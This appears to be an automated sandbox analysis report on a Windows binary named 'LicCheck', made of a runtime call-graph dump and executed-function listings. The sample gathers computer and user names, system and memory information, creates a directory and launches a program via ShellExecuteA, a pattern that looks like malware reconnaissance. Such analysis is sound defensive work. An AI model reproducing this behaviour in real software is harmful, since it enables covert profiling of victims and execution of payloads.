23993->23994 23995 7b3064 23994->23995 23996 7b3092 23995->23996 23997 7abff0 std::_Locinfo::_Locinfo_dtor 41 API calls 23995->23997 23999 7b30c5 23995->23999 23998 7b30ac GetConsoleMode 23996->23998 23996->23999 23997->23996 23998->23999 23999->23972 23999->23973 24000->23988 24001->23968 24002->23988 24003->23989 24004->23988 24005->23989 24006->23989 24007->23940 24008->23942 24010 7b374b __FrameHandler3::FrameUnwindToState 24009->24010 24018 7bb43a EnterCriticalSection 24010->24018 24012 7b3759 24013 7b378a 24012->24013 24019 7b38a3 24012->24019 24032 7b37c4 LeaveCriticalSection __wsopen_s 24013->24032 24016 7b37ad 24016->23945 24017->23945 24018->24012 24033 7bb6b6 24019->24033 24021 7b38b9 24046 7bb625 15 API calls 2 library calls 24021->24046 24023 7b38b3 24023->24021 24024 7bb6b6 __wsopen_s 41 API calls 24023->24024 24031 7b38eb 24023->24031 24028 7b38e2 24024->24028 24025 7bb6b6 __wsopen_s 41 API calls 24026 7b38f7 CloseHandle 24025->24026 24026->24021 24029 7b3903 GetLastError 24026->24029 24027 7b3911 __wsopen_s 24027->24013 24030 7bb6b6 __wsopen_s 41 API calls 24028->24030 24029->24021 24030->24031 24031->24021 24031->24025 24032->24016 24034 7bb6d8 24033->24034 24035 7bb6c3 24033->24035 24037 7ae7e0 __dosmaperr 14 API calls 24034->24037 24040 7bb6fd 24034->24040 24036 7ae7e0 __dosmaperr 14 API calls 24035->24036 24038 7bb6c8 24036->24038 24041 7bb708 24037->24041 24039 7ae7f3 __dosmaperr 14 API calls 24038->24039 24042 7bb6d0 24039->24042 24040->24023 24043 7ae7f3 __dosmaperr 14 API calls 24041->24043 24042->24023 24044 7bb710 24043->24044 24045 7a9def ___std_exception_copy 41 API calls 24044->24045 24045->24042 24046->24027 24047->23905 24048->23906 24049->23714 24065 7adfcd 24050->24065 24054 7a4524 24055 7a4534 24054->24055 24056 7adfcd std::_Locinfo::_Locinfo_dtor 68 API calls 24054->24056 24071 7a4358 15 API calls 2 library calls 24055->24071 24056->24055 24058 798a99 24059 7a454b 68 API calls std::_Locinfo::_Locinfo_dtor 24058->24059 24059->23741 24061 7b3705 ___free_lconv_mon 14 API calls 24060->24061 24062 7ac9d6 24061->24062 24062->23742 24063->23757 24072 7b53b7 24065->24072 24067 7adfda 24068 7add78 std::_Locinfo::_Locinfo_dtor 68 API calls 24067->24068 24069 7a450c 24068->24069 24070 7a4358 15 API calls 2 library calls 24069->24070 24070->24054 24071->24058 24093 7b4d66 5 API calls std::_Locinfo::_Locinfo_dtor 24072->24093 24074 7b53bc 24094 7b4d80 5 API calls std::_Locinfo::_Locinfo_dtor 24074->24094 24076 7b53c1 24095 7b4d9a 5 API calls std::_Locinfo::_Locinfo_dtor 24076->24095 24078 7b53c6 24096 7b4db4 5 API calls std::_Locinfo::_Locinfo_dtor 24078->24096 24080 7b53cb 24097 7b4dce 5 API calls std::_Locinfo::_Locinfo_dtor 24080->24097 24082 7b53d0 24098 7b4de8 5 API calls std::_Locinfo::_Locinfo_dtor 24082->24098 24084 7b53d5 24099 7b4e02 5 API calls std::_Locinfo::_Locinfo_dtor 24084->24099 24086 7b53da 24100 7b4e1c 5 API calls std::_Locinfo::_Locinfo_dtor 24086->24100 24088 7b53df 24101 7b4e50 5 API calls std::_Locinfo::_Locinfo_dtor 24088->24101 24090 7b53e4 24102 7b4e36 5 API calls std::_Locinfo::_Locinfo_dtor 24090->24102 24092 7b53e9 24092->24092 24093->24074 24094->24076 24095->24078 24096->24080 24097->24082 24098->24084 24099->24086 24100->24088 24101->24090 24102->24092 24103->23761 24104->23763 24105->23765 24106->23767 24108 7974cb 24107->24108 24109 79748f 24107->24109 24108->23772 24113 7972a0 24109->24113 24111 7974b7 24112 7aa477 71 API calls 24111->24112 24112->24108 24114 79735a 24113->24114 24115 7972bd 24113->24115 24116 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24114->24116 24115->24114 24121 7972c7 24115->24121 24117 797367 24116->24117 24117->24111 24118 797348 24119 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24118->24119 24120 797356 24119->24120 24120->24111 24121->24118 24122 7972f6 24121->24122 24124 797310 24121->24124 24122->24118 24123 7972fb 24122->24123 24127 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24123->24127 24125 797331 24124->24125 24132 7ac72b 24124->24132 24126 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24125->24126 24129 797344 24126->24129 24130 79730c 24127->24130 24129->24111 24130->24111 24133 7ac73e ___std_exception_copy 24132->24133 24138 7ac50a 24133->24138 24135 7ac753 24136 7a9b2b ___std_exception_copy 41 API calls 24135->24136 24137 79732a 24136->24137 24137->24118 24137->24125 24139 7ac518 24138->24139 24140 7ac540 24138->24140 24139->24140 24141 7ac547 24139->24141 24142 7ac525 24139->24142 24140->24135 24146 7ac463 24141->24146 24154 7a9d72 41 API calls 2 library calls 24142->24154 24147 7ac46f __FrameHandler3::FrameUnwindToState 24146->24147 24155 7ac413 EnterCriticalSection 24147->24155 24149 7ac47d 24156 7ac4be 24149->24156 24153 7ac49b 24153->24135 24154->24140 24155->24149 24164 7b4a2a 24156->24164 24162 7ac48a 24163 7ac4b2 LeaveCriticalSection __fread_nolock 24162->24163 24163->24153 24165 7b49ef 41 API calls 24164->24165 24166 7b4a3b 24165->24166 24167 7ac4d6 24166->24167 24168 7b3ae9 __fread_nolock 15 API calls 24166->24168 24171 7ac581 24167->24171 24169 7b4a95 24168->24169 24170 7b3705 ___free_lconv_mon 14 API calls 24169->24170 24170->24167 24174 7ac593 24171->24174 24175 7ac4f4 24171->24175 24172 7ac5a1 24173 7a9d72 ___std_exception_copy 41 API calls 24172->24173 24173->24175 24174->24172 24174->24175 24178 7ac5d7 _Yarn 24174->24178 24180 7b4ad6 66 API calls ___scrt_uninitialize_crt 24175->24180 24176 7aa226 ___scrt_uninitialize_crt 66 API calls 24176->24178 24177 7b262b __fread_nolock 41 API calls 24177->24178 24178->24175 24178->24176 24178->24177 24179 7b33fd __wsopen_s 66 API calls 24178->24179 24179->24178 24180->24162 24183->23344 24185->23368 24188 795f55 24187->24188 24190 795f6e 24188->24190 24197 7982e0 24188->24197 24193 795fc6 24190->24193 24207 798b80 72 API calls 7 library calls 24190->24207 24191 793a20 43 API calls 24195 796085 24191->24195 24193->24191 24194 7941f7 24194->23388 24195->24194 24208 798410 43 API calls 24195->24208 24198 7983cf 24197->24198 24199 798324 24197->24199 24200 7a53be __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 24198->24200 24209 797100 43 API calls 24199->24209 24202 798402 24200->24202 24202->24190 24203 79832d 24204 7983b7 24203->24204 24205 793a20 43 API calls 24203->24205 24204->24198 24210 798410 43 API calls 24204->24210 24205->24204 24207->24193 24208->24194 24209->24203 24210->24198 24211->23400 24212->23402 24213->23404 24214->23406 24215->23408 24216->23410 24217->23412 24218->23414 24219->23418 24220->23420 24221->23424 24222->23426 24223->23430 24224->23432 24225->23436 24226->23438 24227->23442 24228->23444 24229->23448 24230->23450 24231->23454 24232->23456 24233->23460 24234->23462 24235->23466 24236->23468 24237->23472 24238->23474 24239->23478 24240->23480 24241->23484 24242->23486 24243->23490 24244->23492 24245->23496 24246->23498 24247->23502 24248->23504 24249->23508 24250->23510 24251->23514 24252->23516 24253->23520 24254->23522 24255->23526 24256->23528 24257->23530 24258->23532 24259->23534 24260->23536 24261->23538 24262->23540 24263->23543 24264->23558 24266 7adc54 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 24265->24266 24266->23558 24268->23558 24269->23558 24270->23558 24271->23558 24272->23558 24274 7a322b CreateDirectoryA 24273->24274 24274->23562 24276 7a3e3b 24275->24276 24303 799bd0 24276->24303 24278 7a3e4f 24280 7a3e7b 24278->24280 24310 795500 24278->24310 24279 793a20 43 API calls 24281 7a3ef2 24279->24281 24280->24279 24281->23588 24284 7a3cb5 24283->24284 24285 7982e0 43 API calls 24284->24285 24287 7a3cce 24284->24287 24285->24287 24286 793a20 43 API calls 24289 7a3da0 24286->24289 24288 7a3d03 24287->24288 24457 795340 24287->24457 24462 795335 24287->24462 24288->24286 24290 7a3db7 24289->24290 24466 798410 43 API calls 24289->24466 24290->23588 24295 7b2340 __Getcoll 41 API calls 24294->24295 24296 7a3613 24295->24296 24296->23593 24298 7b2340 __Getcoll 41 API calls 24297->24298 24299 7adc88 24298->24299 24299->23597 24304 799c30 24303->24304 24305 799c03 24303->24305 24306 799c3c 24304->24306 24308 7982e0 43 API calls 24304->24308 24307 793a20 43 API calls 24305->24307 24306->24278 24309 799c1c 24307->24309 24308->24306 24309->24278 24315 79551f _Yarn 24310->24315 24311 795692 24312 7ad786 __fread_nolock 55 API calls 24311->24312 24313 795525 _Yarn 24311->24313 24312->24313 24313->24280 24315->24311 24315->24313 24316 7ad786 24315->24316 24319 7ad7a3 24316->24319 24320 7ad7af __FrameHandler3::FrameUnwindToState 24319->24320 24321 7ad7f9 24320->24321 24322 7ad7c2 __fread_nolock 24320->24322 24331 7ad79e 24320->24331 24332 7ac413 EnterCriticalSection 24321->24332 24346 7ae7f3 14 API calls __dosmaperr 24322->24346 24324 7ad803 24333 7ad5a0 24324->24333 24327 7ad7dc 24347 7a9def 41 API calls ___std_exception_copy 24327->24347 24331->24315 24332->24324 24335 7ad5b1 __fread_nolock 24333->24335 24345 7ad5cd 24333->24345 24334 7ad5bd 24349 7ae7f3 14 API calls __dosmaperr 24334->24349 24335->24334 24339 7ad60f __fread_nolock 24335->24339 24335->24345 24337 7ad5c2 24350 7a9def 41 API calls ___std_exception_copy 24337->24350 24340 7ad736 __fread_nolock 24339->24340 24341 7b262b __fread_nolock 41 API calls 24339->24341 24339->24345 24351 7ad840 41 API calls 4 library calls 24339->24351 24352 7b6c6d 24339->24352 24417 7ae7f3 14 API calls __dosmaperr 24340->24417 24341->24339 24348 7ad838 LeaveCriticalSection __fread_nolock 24345->24348 24346->24327 24347->24331 24348->24331 24349->24337 24350->24345 24351->24339 24353 7b6c7f 24352->24353 24354 7b6c97 24352->24354 24427 7ae7e0 14 API calls __dosmaperr 24353->24427 24356 7b6fed 24354->24356 24361 7b6cdd 24354->24361 24449 7ae7e0 14 API calls __dosmaperr 24356->24449 24357 7b6c84 24428 7ae7f3 14 API calls __dosmaperr 24357->24428 24360 7b6ff2 24450 7ae7f3 14 API calls __dosmaperr 24360->24450 24362 7b6c8c 24361->24362 24364 7b6ce8 24361->24364 24368 7b6d18 24361->24368 24362->24339 24429 7ae7e0 14 API calls __dosmaperr 24364->24429 24365 7b6cf5 24451 7a9def 41 API calls ___std_exception_copy 24365->24451 24367 7b6ced 24430 7ae7f3 14 API calls __dosmaperr 24367->24430 24371 7b6d31 24368->24371 24372 7b6d4b 24368->24372 24373 7b6d7c 24368->24373 24371->24372 24374 7b6d36 24371->24374 24431 7ae7e0 14 API calls __dosmaperr 24372->24431 24434 7b3ae9 24373->24434 24418 7be037 24374->24418 24377 7b6d50 24432 7ae7f3 14 API calls __dosmaperr 24377->24432 24381 7b3705 ___free_lconv_mon 14 API calls 24385 7b6d96 24381->24385 24382 7b6d57 24433 7a9def 41 API calls ___std_exception_copy 24382->24433 24383 7b6ec9 24384 7b6f3d 24383->24384 24387 7b6ee2 GetConsoleMode 24383->24387 24389 7b6f41 ReadFile 24384->24389 24388 7b3705 ___free_lconv_mon 14 API calls 24385->24388 24387->24384 24390 7b6ef3 24387->24390 24391 7b6d9d 24388->24391 24392 7b6f59 24389->24392 24393 7b6fb5 GetLastError 24389->24393 24390->24389 24395 7b6ef9 ReadConsoleW 24390->24395 24396 7b6dc2 24391->24396 24397 7b6da7 24391->24397 24392->24393 24394 7b6f32 24392->24394 24398 7b6f19 24393->24398 24399 7b6fc2 24393->24399 24409 7b6f7e 24394->24409 24410 7b6f95 24394->24410 24414 7b6d62 __fread_nolock 24394->24414 24395->24394 24402 7b6f13 GetLastError 24395->24402 24443 7b7213 43 API calls 2 library calls 24396->24443 24441 7ae7f3 14 API calls __dosmaperr 24397->24441 24398->24414 24444 7ae799 14 API calls __dosmaperr 24398->24444 24447 7ae7f3 14 API calls __dosmaperr 24399->24447 24402->24398 24403 7b3705 ___free_lconv_mon 14 API calls 24403->24362 24405 7b6fc7 24448 7ae7e0 14 API calls __dosmaperr 24405->24448 24407 7b6dac 24442 7ae7e0 14 API calls __dosmaperr 24407->24442 24445 7b6987 46 API calls 2 library calls 24409->24445 24413 7b6fae 24410->24413 24410->24414 24446 7b67df 44 API calls __fread_nolock 24413->24446 24414->24403 24416 7b6fb3 24416->24414 24417->24337 24419 7be044 24418->24419 24421 7be051 24418->24421 24452 7ae7f3 14 API calls __dosmaperr 24419->24452 24423 7be05d 24421->24423 24453 7ae7f3 14 API calls __dosmaperr 24421->24453 24422 7be049 24422->24383 24423->24383 24425 7be07e 24454 7a9def 41 API calls ___std_exception_copy 24425->24454 24427->24357 24428->24362 24429->24367 24430->24365 24431->24377 24432->24382 24433->24414 24435 7b3b27 24434->24435 24439 7b3af7 __dosmaperr 24434->24439 24456 7ae7f3 14 API calls __dosmaperr 24435->24456 24437 7b3b12 RtlAllocateHeap 24438 7b3b25 24437->24438 24437->24439 24438->24381 24439->24435 24439->24437 24455 7b1945 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 24439->24455 24441->24407 24442->24414 24443->24374 24444->24414 24445->24414 24446->24416 24447->24405 24448->24414 24449->24360 24450->24365 24451->24362 24452->24422 24453->24425 24454->24422 24455->24439 24456->24438 24458 79535a _Yarn 24457->24458 24459 795426 _Yarn 24457->24459 24458->24288 24460 7ac72b 69 API calls 24459->24460 24461 7954da 24459->24461 24460->24461 24461->24288 24464 795340 _Yarn 24462->24464 24463 79535a _Yarn 24463->24288 24464->24463 24465 7ac72b 69 API calls 24464->24465 24465->24463 24466->24290 24467->23646 24469 7afe73 24468->24469 24470 7afe85 24468->24470 24495 7aff0e GetModuleHandleW 24469->24495 24480 7afd0e 24470->24480 24473 7afe78 24473->24470 24496 7aff73 GetModuleHandleExW 24473->24496 24475 7a53ab 24475->23239 24479 7afed7 24481 7afd1a __FrameHandler3::FrameUnwindToState 24480->24481 24502 7add02 EnterCriticalSection 24481->24502 24483 7afd24 24503 7afd5b 24483->24503 24485 7afd31 24507 7afd4f 24485->24507 24488 7afedd 24512 7aff51 24488->24512 24491 7afefb 24493 7aff73 std::locale::_Setgloballocale 3 API calls 24491->24493 24492 7afeeb GetCurrentProcess TerminateProcess 24492->24491 24494 7aff03 ExitProcess 24493->24494 24495->24473 24497 7affb2 GetProcAddress 24496->24497 24498 7affd3 24496->24498 24497->24498 24499 7affc6 24497->24499 24500 7affd9 FreeLibrary 24498->24500 24501 7afe84 24498->24501 24499->24498 24500->24501 24501->24470 24502->24483 24505 7afd67 __FrameHandler3::FrameUnwindToState 24503->24505 24504 7afdce std::locale::_Setgloballocale 24504->24485 24505->24504 24510 7b1c76 14 API calls 3 library calls 24505->24510 24511 7add4a LeaveCriticalSection 24507->24511 24509 7afd3d 24509->24475 24509->24488 24510->24504 24511->24509 24517 7bb2bb 6 API calls std::locale::_Setgloballocale 24512->24517 24514 7aff56 24515 7aff5b GetPEB 24514->24515 24516 7afee7 24514->24516 24515->24516 24516->24491 24516->24492 24517->24514 24518 7b2652 24519 7b262b __fread_nolock 41 API calls 24518->24519 24521 7b265f 24519->24521 24520 7b266b 24521->24520 24525 7b26b7 24521->24525 24541 7b281a 43 API calls __wsopen_s 24521->24541 24525->24520 24529 7b2719 24525->24529 24530 7b49ef 24525->24530 24527 7b272a 24542 7b2748 66 API calls 2 library calls 24529->24542 24531 7b49fb 24530->24531 24532 7b270c 24531->24532 24533 7b262b __fread_nolock 41 API calls 24531->24533 24532->24529 24536 7b5c43 24532->24536 24534 7b4a16 24533->24534 24535 7be037 __fread_nolock 41 API calls 24534->24535 24535->24532 24537 7b2a9c __dosmaperr 14 API calls 24536->24537 24538 7b5c60 24537->24538 24539 7b3705 ___free_lconv_mon 14 API calls 24538->24539 24540 7b5c6a 24539->24540 24540->24529 24541->24525 24542->24527 24543 7950b0 24544 7950b9 24543->24544 24545 7950dc 24543->24545 24544->24545 24548 7aa2fd 24544->24548 24547 7950cd 24549 7aa30f 24548->24549 24553 7aa318 ___scrt_uninitialize_crt 24548->24553 24564 7aa181 70 API calls ___scrt_uninitialize_crt 24549->24564 24551 7aa315 24551->24547 24552 7aa329 24552->24547 24553->24552 24556 7aa121 24553->24556 24557 7aa12d __FrameHandler3::FrameUnwindToState 24556->24557 24565 7ac413 EnterCriticalSection 24557->24565 24559 7aa13b 24566 7aa28f 24559->24566 24563 7aa15e 24563->24547 24564->24551 24565->24559 24567 7aa2a4 ___std_exception_copy 24566->24567 24568 7aa2ab 24567->24568 24569 7aa2b6 24567->24569 24580 7aa181 70 API calls ___scrt_uninitialize_crt 24568->24580 24571 7aa226 ___scrt_uninitialize_crt 66 API calls 24569->24571 24573 7aa2c0 24571->24573 24572 7aa2b1 24574 7a9b2b ___std_exception_copy 41 API calls 24572->24574 24573->24572 24575 7b262b __fread_nolock 41 API calls 24573->24575 24576 7aa14c 24574->24576 24577 7aa2d7 24575->24577 24579 7aa175 LeaveCriticalSection __fread_nolock 24576->24579 24581 7b2b9b 45 API calls 3 library calls 24577->24581 24579->24563 24580->24572 24581->24572 24582 7b4b14 24583 7b4b21 24582->24583 24588 7b4b39 24582->24588 24632 7ae7f3 14 API calls __dosmaperr 24583->24632 24585 7b4b26 24633 7a9def 41 API calls ___std_exception_copy 24585->24633 24587 7b4b31 24588->24587 24589 7b4b98 24588->24589 24590 7b5c43 14 API calls 24588->24590 24591 7b262b __fread_nolock 41 API calls 24589->24591 24590->24589 24592 7b4bb1 24591->24592 24602 7b6b59 24592->24602 24595 7b262b __fread_nolock 41 API calls 24596 7b4bea 24595->24596 24596->24587 24597 7b262b __fread_nolock 41 API calls 24596->24597 24598 7b4bf8 24597->24598 24598->24587 24599 7b262b __fread_nolock 41 API calls 24598->24599 24600 7b4c06 24599->24600 24601 7b262b __fread_nolock 41 API calls 24600->24601 24601->24587 24603 7b6b65 __FrameHandler3::FrameUnwindToState 24602->24603 24604 7b6b6d 24603->24604 24609 7b6b85 24603->24609 24635 7ae7e0 14 API calls __dosmaperr 24604->24635 24606 7b6c42 24642 7ae7e0 14 API calls __dosmaperr 24606->24642 24608 7b6b72 24636 7ae7f3 14 API calls __dosmaperr 24608->24636 24609->24606 24612 7b6bbb 24609->24612 24610 7b6c47 24643 7ae7f3 14 API calls __dosmaperr 24610->24643 24614 7b6bd9 24612->24614 24615 7b6bc4 24612->24615 24634 7bb43a EnterCriticalSection 24614->24634 24637 7ae7e0 14 API calls __dosmaperr 24615->24637 24617 7b6bd1 24644 7a9def 41 API calls ___std_exception_copy 24617->24644 24619 7b6bdf 24621 7b6bfb 24619->24621 24622 7b6c10 24619->24622 24620 7b6bc9 24638 7ae7f3 14 API calls __dosmaperr 24620->24638 24639 7ae7f3 14 API calls __dosmaperr 24621->24639 24626 7b6c6d __fread_nolock 53 API calls 24622->24626 24628 7b6c0b 24626->24628 24627 7b6c00 24640 7ae7e0 14 API calls __dosmaperr 24627->24640 24641 7b6c3a LeaveCriticalSection __wsopen_s 24628->24641 24631 7b4bb9 24631->24587 24631->24595 24632->24585 24633->24587 24634->24619 24635->24608 24636->24631 24637->24620 24638->24617 24639->24627 24640->24628 24641->24631 24642->24610 24643->24617 24644->24631

                                                                                                    Executed Functions

                                                                                                    Function 007A3210 Relevance: 32.1, APIs: 4, Strings: 14, Instructions: 610COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 0 7a3210-7a3404 call 7a5ff0 CreateDirectoryA call 7a6f20 call 7984a0 call 797570 call 7a6f20 call 7984a0 call 797570 15 7a340a-7a3419 call 7a47ac 0->15 16 7a349f-7a34bd 0->16 15->16 21 7a341f-7a344c call 797370 call 798930 15->21 18 7a34c0-7a34e2 call 793a20 16->18 24 7a34e8-7a34ed call 7a47ac 18->24 25 7a357d-7a359b 18->25 39 7a3451-7a346c call 797210 21->39 29 7a34f2-7a34f7 24->29 28 7a359e-7a35b7 call 793a20 25->28 36 7a35b9 28->36 37 7a3606-7a3641 call 7adc1b call 7adca4 call 7adcb6 call 7adc83 28->37 29->25 32 7a34fd-7a354a call 797370 call 798930 call 797210 29->32 63 7a355f-7a357b 32->63 64 7a354c-7a3555 32->64 41 7a35c0-7a35ee call 7a3df0 call 7a3c70 36->41 66 7a3647-7a3656 call 7adc83 37->66 51 7a346e-7a3477 39->51 52 7a3481-7a349d 39->52 54 7a35f3-7a3604 41->54 51->52 62 7a3479-7a347d 51->62 52->18 54->37 54->41 62->52 63->28 64->63 69 7a3557-7a355b 64->69 71 7a3658-7a3666 66->71 69->63 72 7a3668-7a3676 call 7a3c70 71->72 73 7a3680-7a36a1 call 7ac9be call 7982e0 call 797480 71->73 76 7a367b-7a367e 72->76 82 7a36cc-7a36d9 call 797480 73->82 83 7a36a3-7a36c7 call 793a20 73->83 76->72 76->73 87 7a36db-7a36ff call 793a20 82->87 88 7a3704-7a372f 82->88 83->82 87->88 89 7a3736-7a3743 88->89 91 7a374d-7a375d 89->91 92 7a3745-7a374b 89->92 93 7a3760-7a3765 91->93 92->89 93->93 94 7a3767-7a3778 93->94 95 7a377e-7a38da call 792a70 call 792530 call 792760 94->95 96 7a3c56 call 791bd0 94->96 109 7a38e0-7a38f1 95->109 100 7a3c5b call 7a9dff 96->100 104 7a3c60-7a3c65 call 7a9dff 100->104 109->109 110 7a38f3-7a395b call 792530 109->110 113 7a398c-7a39b4 110->113 114 7a395d-7a396c 110->114 117 7a39b6-7a39c5 113->117 118 7a39e5-7a3a0d 113->118 115 7a396e-7a397c 114->115 116 7a3982-7a3989 call 7a564d 114->116 115->100 115->116 116->113 120 7a39db-7a39e2 call 7a564d 117->120 121 7a39c7-7a39d5 117->121 122 7a3a3e-7a3a7d 118->122 123 7a3a0f-7a3a1e 118->123 120->118 121->100 121->120 124 7a3a80-7a3a8d 122->124 127 7a3a20-7a3a2e 123->127 128 7a3a34-7a3a3b call 7a564d 123->128 130 7a3a8f-7a3a95 124->130 131 7a3a97-7a3b00 ShellExecuteA 124->131 127->100 127->128 128->122 130->124 134 7a3b02-7a3b11 131->134 135 7a3b31-7a3c55 call 795bb0 call 7a464d call 795bb0 call 7a464d call 7a53be 131->135 136 7a3b13-7a3b21 134->136 137 7a3b27-7a3b2e call 7a564d 134->137 136->104 136->137 137->135
                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNELBASE(007D5AEC,00000000), ref: 007A3261
                                                                                                      • Part of subcall function 007984A0: std::locale::_Init.LIBCPMT ref: 00798532
                                                                                                      • Part of subcall function 00797570: std::locale::_Init.LIBCPMT ref: 007975C2
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798966
                                                                                                      • Part of subcall function 00798930: std::_Lockit::_Lockit.LIBCPMT ref: 00798988
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989A8
                                                                                                      • Part of subcall function 00798930: std::_Lockit::~_Lockit.LIBCPMT ref: 007989CF
                                                                                                    • ShellExecuteA.SHELL32(00000000,?,?,?,00000000,00000000), ref: 007A3AF1
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007A3BBA
                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 007A3C33
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2101737721.0000000000791000.00000020.00000001.01000000.00000009.sdmp, Offset: 00790000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2101713827.0000000000790000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2101890387.00000000007C5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102021195.00000000007D5000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2102101185.00000000007D7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_790000_LicCheck.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Lockitstd::_$InitIos_base_dtorLockit::_Lockit::~_std::ios_base::_std::locale::_$CreateDirectoryExecuteShell
                                                                                                    • String ID: %`o2$($)`q`$,_OD$I$X$XM_G$`$o&$p}$p}$r$}$Z}
                                                                                                    • API String ID: 931165786-3414494760
                                                                                                    • Opcode ID: 27d9447845a7be160e48ae80fc8faadf7d6a5916ed874fa4be8dfc2abbeaeb00
                                                                                                    • Instruction ID: 7d8042759e879aed88ad6ad891d941f2a25c76255a26d4c818090ff25f911233
                                                                                                    • Opcode Fuzzy Hash: 27d9447845a7be160e48ae80fc8faadf7d6a5916ed874fa4be8dfc2abbeaeb00
                                                                                                    • Instruction Fuzzy Hash: C2528F70900298DFDB28CF24DC99BE9BBB4AF56304F1481D9E64DAB252D7789AC4CF50
                                                                                                    Function 007946E0 Relevance: 14.7, APIs: 4, Strings: 4, Instructions: 659COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 222 7946e0-794714 call 793b60 225 79471a-794721 call 793f90 222->225 226 795027-795043 call 7a53be 222->226 225->226 231 794727-794760 SHGetFolderPathA 225->231 232 794763-794768 231->232 232->232 233 79476a-7947af call 792830 232->233 236 7947b0-7947b5 233->236 236->236 237 7947b7-7947ca 236->237 238 7947d0-794831 call 792a70 call 792760 call 796190 237->238 239 795044 call 791bd0 237->239 253 794833-794842 238->253 254 794862-79488a 238->254 242 795049 call 7a9dff 239->242 246 79504e call 791bd0 242->246 250 795053 call 7a9dff 246->250 257 795058 call 791bd0 250->257 258 794858-79485f call 7a564d 253->258 259 794844-794852 253->259 255 7948bb-7948ea 254->255 256 79488c-79489b 254->256 264 7948f0-7948f5 255->264 261 79489d-7948ab 256->261 262 7948b1-7948b8 call 7a564d 256->262 267 79505d call 7a9dff 257->267 258->254 259->242 259->258 261->242 261->262 262->255 264->264 268 7948f7-7948ff 264->268 272 795062 call 7a9dff 267->272 268->246 271 794905-7949ec call 792a70 call 792760 call 792530 call 796190 268->271 285 794a1d-794a2a 271->285 286 7949ee-7949fd 271->286 276 795067-79508b call 7a9dff 272->276 289 794a5b-794a83 285->289 290 794a2c-794a3b 285->290 287 7949ff-794a0d 286->287 288 794a13-794a1a call 7a564d 286->288 287->250 287->288 288->285 291 794a85-794a94 289->291 292 794ab4-794ae0 289->292 294 794a3d-794a4b 290->294 295 794a51-794a58 call 7a564d 290->295 296 794aaa-794ab1 call 7a564d 291->296 297 794a96-794aa4 291->297 298 794ae3-794ae8 292->298 294->250 294->295 295->289 296->292 297->250 297->296 298->298 302 794aea-794af0 298->302 302->257 305 794af6-794bdd call 792a70 call 792760 call 792530 call 796190 302->305 314 794bdf-794bee 305->314 315 794c0e-794c1b 305->315 316 794bf0-794bfe 314->316 317 794c04-794c0b call 7a564d 314->317 318 794c1d-794c2c 315->318 319 794c4c-794c74 315->319 316->267 316->317 317->315 321 794c2e-794c3c 318->321 322 794c42-794c49 call 7a564d 318->322 323 794ca5-794cac call 794350 319->323 324 794c76-794c85 319->324 321->267 321->322 322->319 334 794ff1-794ffa 323->334 335 794cb2-794ccf GetModuleFileNameA 323->335 328 794c9b-794ca2 call 7a564d 324->328 329 794c87-794c95 324->329 328->323 329->267 329->328 334->226 336 794ffc-79500b 334->336 337 794cd0-794cd5 335->337 338 79501d-795024 call 7a564d 336->338 339 79500d-79501b 336->339 337->337 340 794cd7-794d41 call 7985d0 GetComputerNameA GetUserNameA 337->340 338->226 339->276 339->338 345 794d44-794d49 340->345 345->345 346 794d4b-794d8b call 792830 345->346 349 794d90-794d95 346->349 349->349 350 794d97-794e51 call 792830 call 792530 call 7996c0 call 796190 349->350 359 794e53-794e62 350->359 360 794e82-794e8f 350->360 361 794e78-794e7f call 7a564d 359->361 362 794e64-794e72 359->362 363 794e91-794ea0 360->363 364 794ec0-794ecd 360->364 361->360 362->272 362->361 368 794ea2-794eb0 363->368 369 794eb6-794ebd call 7a564d 363->369 365 794ecf-794ede 364->365 366 794efe-794f26 364->366 371 794ee0-794eee 365->371 372 794ef4-794efb call 7a564d 365->372 373 794f28-794f37 366->373 374 794f57-794f89 366->374 368->272 368->369 369->364 371->272 371->372 372->366 380 794f39-794f47 373->380 381 794f4d-794f54 call 7a564d 373->381 376 794f8b-794f8e 374->376 377 794fec call 7a3210 374->377 382 794fa1-794fa4 376->382 383 794f90-794f94 376->383 377->334 380->272 380->381 381->374 387 794fa6-794faa 382->387 389 794fda 382->389 383->387 388 794f96-794f9f 383->388 391 794fac-794faf 387->391 392 794fd3-794fd8 387->392 388->382 388->383 393 794fdc-794fde 389->393 391->389 394 794fb1-794fb7 391->394 392->393 393->377 395 794fe0-794fea call 794050 call 79a030 393->395 394->392 396 794fb9-794fbc 394->396 395->334 396->389 399 794fbe-794fc4 396->399 399->392 401 794fc6-794fc9 399->401 401->389 403 794fcb-794fd1 401->403 403->389 403->392
                                                                                                    APIs
                                                                                                      • Part of subcall function 00793B60: GetSystemInfo.KERNELBASE(?), ref: 00793B7F
                                                                                                      • Part of subcall function 00793B60: GlobalMemoryStatusEx.KERNELBASE(?), ref: 00793BA0
